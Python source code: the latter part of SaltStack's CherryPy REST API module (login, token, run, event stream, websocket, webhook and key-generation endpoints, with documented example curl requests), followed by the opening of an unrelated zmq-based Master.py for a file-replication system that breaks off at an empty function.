lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The examples above show how to establish a websocket connection to Salt and
activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
Master.py
|
import socket
import time
from collections import defaultdict
from threading import RLock, Thread
import zmq
def nested_dict(n, type):
if n == 1:
return defaultdict(type)
else:
return defaultdict(lambda: nested_dict(n-1, type))
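# Usage sketch (illustrative only): nested_dict(2, list) builds a two-level
# defaultdict, so keys can be indexed without prior initialization, e.g.
#   d = nested_dict(2, list)
#   d["tcp://10.0.0.1:"]["8000"].append("video.mp4")
#   # d -> {"tcp://10.0.0.1:": {"8000": ["video.mp4"]}}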
masterHeadFinished = 0
# masterDataFile = { ip1: { port1: [ file1, file2, ... ], port2: [...], ... }, ip2: {...} }
masterDataFile = nested_dict(2, list)
# dataKeepersState = { ip1: { port1: True, port2: False, ... }, ip2: { port1: True, ... }, ... }
dataKeepersState = nested_dict(2, bool)
# filesDictionary = { filename1: [ { ip1: [port1, port2, ...], ip2: [...], ... } , instanceCount], filename2: [...] }
filesDictionary = nested_dict(1, list)
# filesDictionary["filenameKey.mp4"][1] = instanceCount
# filesDictionary["filenameKey.mp4"][0]["tcp:127.0.0.1"] = [8000, 8001, 8002]
iAmAliveDict = nested_dict(1, int)
headDataKeepers = {}
doNreplicates = False
masterIP = "10.147.18.210"
def getIp():
